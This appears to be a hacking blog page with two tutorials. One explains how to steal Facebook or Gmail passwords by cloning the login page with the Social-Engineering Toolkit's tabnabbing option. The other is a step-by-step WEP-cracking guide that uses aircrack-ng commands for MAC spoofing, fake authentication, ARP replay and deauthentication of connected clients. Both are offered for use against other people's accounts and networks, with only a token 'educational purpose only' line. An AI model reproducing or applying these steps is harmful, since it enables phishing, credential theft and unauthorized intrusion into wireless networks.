Hack facebook and Gmail using Backtrack 5

I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set

Now Open social Engineering Tool kit (SET) ./set

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER

Then select 2nd option “Site Cloner” and Hit ENTER

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)

Now just hit the enter.

Open new terminal and just type ifconfig and hit ENTER

Now just copy this IP address and open it in Browser.

Now here I am just typing test email and password to see whether it works or not.

Now just hit enter and switch back to our terminal and we found the Email and password !

This tutorial is just educational purpose only.

Read More

How to crack WEP with BackTrack 5

1.) Start monitor mode:

airmon-ng

Copy down interface

airmon-ng start (interface)

If it says "mon0" or"wifi0" is used, this is your new interface

If it says other things are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your targets BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface(s)

ifconfig (interface) down

macchanger--mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating client’s MACs under Station

If found & step 6 isn’t going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs

If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

Retry with the fudge factor increased by4 more if that’s unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

* Other attack methods:

Injection attack with 2 wireless cards:

aireplay -9 -i (receiving interface) (injecting interface)

If fails on Attack -5, make sure the injection interface MAC matches the current card MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online

This will disconnect the authenticated client, so they may be suspect...

Read More